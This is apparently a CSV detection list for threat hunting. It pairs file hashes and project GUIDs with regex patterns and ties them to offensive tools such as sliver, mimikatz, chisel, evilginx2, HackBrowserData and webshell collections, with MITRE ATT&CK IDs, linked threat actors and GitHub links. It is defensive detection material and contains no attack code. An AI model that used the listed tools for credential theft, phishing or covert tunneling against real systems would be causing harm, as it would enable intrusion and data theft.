"*3d63505863fa5f18ff990c4686a21d17fd618da9ca2490c22d0f7f5045f3581f*",".{0,1000}3d63505863fa5f18ff990c4686a21d17fd618da9ca2490c22d0f7f5045f3581f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25094"
"*3d63d98655436fa1bd05ede7afdc60fd2418f18cf64da091a5ae1bf7f1923687*",".{0,1000}3d63d98655436fa1bd05ede7afdc60fd2418f18cf64da091a5ae1bf7f1923687.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25095"
"*3d6819160cb77ce2d0446449a6b7584dd02ef694762b3ef0cd57563a10c111f6*",".{0,1000}3d6819160cb77ce2d0446449a6b7584dd02ef694762b3ef0cd57563a10c111f6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25096"
"*3d686ba6d6985ff3febf3cd3d45cb5eb18eff45bfec74142865ded01f9c00503*",".{0,1000}3d686ba6d6985ff3febf3cd3d45cb5eb18eff45bfec74142865ded01f9c00503.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","#filehash","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","25097"
"*3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9*",".{0,1000}3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#filehash #linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","25100"
"*3d77766aee0c6991e73b44c34c3014b25e1c0730e89e593c53f4f846ca0bd40d*",".{0,1000}3d77766aee0c6991e73b44c34c3014b25e1c0730e89e593c53f4f846ca0bd40d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25101"
"*3d86ecb9e14e7d1a86e16fa28b61fed96ca5bb9dccbfc1c2f8d1231325755ef1*",".{0,1000}3d86ecb9e14e7d1a86e16fa28b61fed96ca5bb9dccbfc1c2f8d1231325755ef1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25103"
"*3d99d90feac8540dcb9639318d5e3ef96726b11f58d418d08023117ff7fcd9fc*",".{0,1000}3d99d90feac8540dcb9639318d5e3ef96726b11f58d418d08023117ff7fcd9fc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25104"
"*3d9b9f20cf22e17016d2e46bbf85f4e1dbb605959e8ed288bac7daf67cbff731*",".{0,1000}3d9b9f20cf22e17016d2e46bbf85f4e1dbb605959e8ed288bac7daf67cbff731.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25105"
"*3D9D679D-6052-4C5E-BD91-2BC3DED09D0A*",".{0,1000}3D9D679D\-6052\-4C5E\-BD91\-2BC3DED09D0A.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#GUIDproject","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","25106"
"*3d9e27be3e47c7e35f0a8b3cc989ec9fe4915f323518fc380a64c080a752a7a7*",".{0,1000}3d9e27be3e47c7e35f0a8b3cc989ec9fe4915f323518fc380a64c080a752a7a7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25107"
"*3da6057398b0a35098b4c4d944bf3df03eda0a05b6383d230e32b49733561a86*",".{0,1000}3da6057398b0a35098b4c4d944bf3df03eda0a05b6383d230e32b49733561a86.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","25109"
"*3da905463c66fecfe69d608e98c6cd1defda607d176a73f2b38192a79db3fc65*",".{0,1000}3da905463c66fecfe69d608e98c6cd1defda607d176a73f2b38192a79db3fc65.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25110"
"*3da9c10c87a3f8b9964462299ea2edd92c3b82ed00e412e36a7a4a854b76079c*",".{0,1000}3da9c10c87a3f8b9964462299ea2edd92c3b82ed00e412e36a7a4a854b76079c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25111"
"*3daa15880b0da9e659c2f8df0beb56c5a7637e8a96cfe1a4b171358b4370b4f0*",".{0,1000}3daa15880b0da9e659c2f8df0beb56c5a7637e8a96cfe1a4b171358b4370b4f0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25112"
"*3dac2fe1a99790885eecaee1f0f72d8e06b256b08593aab8945229b5f59efc16*",".{0,1000}3dac2fe1a99790885eecaee1f0f72d8e06b256b08593aab8945229b5f59efc16.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25113"
"*3daf3c3717e738b47246b5fb7106b8b62e374ffc79a1f824eb5aaaec2fbdc27c*",".{0,1000}3daf3c3717e738b47246b5fb7106b8b62e374ffc79a1f824eb5aaaec2fbdc27c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25114"
"*3db74ea470a886d624947d5e8cdc9a5edeba429ddf39b1cf54801b7d5ec53137*",".{0,1000}3db74ea470a886d624947d5e8cdc9a5edeba429ddf39b1cf54801b7d5ec53137.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25116"
"*3db93e0b8f7b39335bfa3f1712a38b8f0e21210772eec85524941e420e9e58ff*",".{0,1000}3db93e0b8f7b39335bfa3f1712a38b8f0e21210772eec85524941e420e9e58ff.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","25117"
"*3dc271adc2565c38eda5fdaee3070bda8962159d17ba625467a0f3a6e5e440d0*",".{0,1000}3dc271adc2565c38eda5fdaee3070bda8962159d17ba625467a0f3a6e5e440d0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25118"
"*3dc7e0f43e9ebe086c137fa1af3bf410c3d566f1edbceeea7ea5e19d1f9ab5b8*",".{0,1000}3dc7e0f43e9ebe086c137fa1af3bf410c3d566f1edbceeea7ea5e19d1f9ab5b8.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","25120"
"*3dca957edf214b435721c18bbacef52a660d618150453589bd95631eb92b5cc8*",".{0,1000}3dca957edf214b435721c18bbacef52a660d618150453589bd95631eb92b5cc8.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","25121"
"*3df5882d88914a064cbba240e1b3615c69c432f807f949a80d0d4b5a9f44ef77*",".{0,1000}3df5882d88914a064cbba240e1b3615c69c432f807f949a80d0d4b5a9f44ef77.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","#filehash","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","25128"
"*3e02ce91331011e03e8de89723c52367ff14d75f7f81b94ad3741f9cc56c5736*",".{0,1000}3e02ce91331011e03e8de89723c52367ff14d75f7f81b94ad3741f9cc56c5736.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25129"
"*3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a*",".{0,1000}3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25135"
"*3e3092fdc0f518823e6cdbff46f7ad327bee6bca9477a826279c7a76bffa7bce*",".{0,1000}3e3092fdc0f518823e6cdbff46f7ad327bee6bca9477a826279c7a76bffa7bce.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25136"
"*3e3956052088b12e9fca1e9a209c00e8e60f5bba79bc09881316c83758a93c1d*",".{0,1000}3e3956052088b12e9fca1e9a209c00e8e60f5bba79bc09881316c83758a93c1d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25137"
"*3e3956052088b12e9fca1e9a209c00e8e60f5bba79bc09881316c83758a93c1d*",".{0,1000}3e3956052088b12e9fca1e9a209c00e8e60f5bba79bc09881316c83758a93c1d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25138"
"*3e3b1b12a07d9b39b6c361763d64a882b91d8f73f207b061b8e2498ecfc9c982*",".{0,1000}3e3b1b12a07d9b39b6c361763d64a882b91d8f73f207b061b8e2498ecfc9c982.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25140"
"*3e3b34ad2eaa319676168ff54b63f3219c517cbd50c3df43b2fb4cfe141b5ab2*",".{0,1000}3e3b34ad2eaa319676168ff54b63f3219c517cbd50c3df43b2fb4cfe141b5ab2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","25141"
"*3e3e74bdc2c23c8b8e6d177588d7d4d371f63b10aec638126c8ecb117579ba11*",".{0,1000}3e3e74bdc2c23c8b8e6d177588d7d4d371f63b10aec638126c8ecb117579ba11.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25143"
"*3e3fcf025697ee80f044716eee053848*",".{0,1000}3e3fcf025697ee80f044716eee053848.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","25144"
"*3e43822dce57d12ca13a1888e2b5d653dfbf9815dd5cda87e1fc1ce29a423170*",".{0,1000}3e43822dce57d12ca13a1888e2b5d653dfbf9815dd5cda87e1fc1ce29a423170.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","25146"
"*3e451b530ade34ae48f51aebf8db1609272ea8d1b1438cfa7c3d570e91b39bd9*",".{0,1000}3e451b530ade34ae48f51aebf8db1609272ea8d1b1438cfa7c3d570e91b39bd9.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","25147"
"*3e475ed049ac5a398735ed67e51fc74e6da81238cb09f0bc1cf0e60d50c37f3d*",".{0,1000}3e475ed049ac5a398735ed67e51fc74e6da81238cb09f0bc1cf0e60d50c37f3d.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","25148"
"*3e55d1d13465cb7e706efa6d4ddf120b35200d694c619889de3d3190236e780a*",".{0,1000}3e55d1d13465cb7e706efa6d4ddf120b35200d694c619889de3d3190236e780a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25149"
"*3e5eb4425abfdce29a04e04cea468e032ad8c0af5a904681f05d9f2e5a4d31a5*",".{0,1000}3e5eb4425abfdce29a04e04cea468e032ad8c0af5a904681f05d9f2e5a4d31a5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25150"
"*3e5f5be55582286c2411062a932d31f3c5b6d489c6e2927525bef92c34083e89*",".{0,1000}3e5f5be55582286c2411062a932d31f3c5b6d489c6e2927525bef92c34083e89.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25151"
"*3e667715625410352da4236f16184e38c442b2af48fd6f8899b954578c974c8b*",".{0,1000}3e667715625410352da4236f16184e38c442b2af48fd6f8899b954578c974c8b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25154"
"*3e6740a3e67c207dc53df0daf1c5717def2b267119c75ff0cf6e36585efc332a*",".{0,1000}3e6740a3e67c207dc53df0daf1c5717def2b267119c75ff0cf6e36585efc332a.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","#filehash","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","25155"
"*3e6db66b8d4aecf07f084a1fe53d66d437b800fe773476154c78df0c78d1e6a2*",".{0,1000}3e6db66b8d4aecf07f084a1fe53d66d437b800fe773476154c78df0c78d1e6a2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25157"
"*3e6e443b0055c7aca76387e9c557976887ecb6bc342185e52d514503b09a535d*",".{0,1000}3e6e443b0055c7aca76387e9c557976887ecb6bc342185e52d514503b09a535d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25158"
"*3e6ea66956ca27686fdb0b1a7fa1a86ddec39e72aa892958bf9f3b4c5dbce7df*",".{0,1000}3e6ea66956ca27686fdb0b1a7fa1a86ddec39e72aa892958bf9f3b4c5dbce7df.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25159"
"*3e7c6abf54cf667239605c72fc13e5ae4be53e65ca83887510362a33a7115a0d*",".{0,1000}3e7c6abf54cf667239605c72fc13e5ae4be53e65ca83887510362a33a7115a0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25162"
"*3e829ec96d65a4bc7c962b997c0363ac690ee3206a413980cc7bb8d300c8a3bc*",".{0,1000}3e829ec96d65a4bc7c962b997c0363ac690ee3206a413980cc7bb8d300c8a3bc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25165"
"*3e86bf634c4f10502b64f39dba0990e9357ff141d61020b76dd2f3514f02910e*",".{0,1000}3e86bf634c4f10502b64f39dba0990e9357ff141d61020b76dd2f3514f02910e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25166"
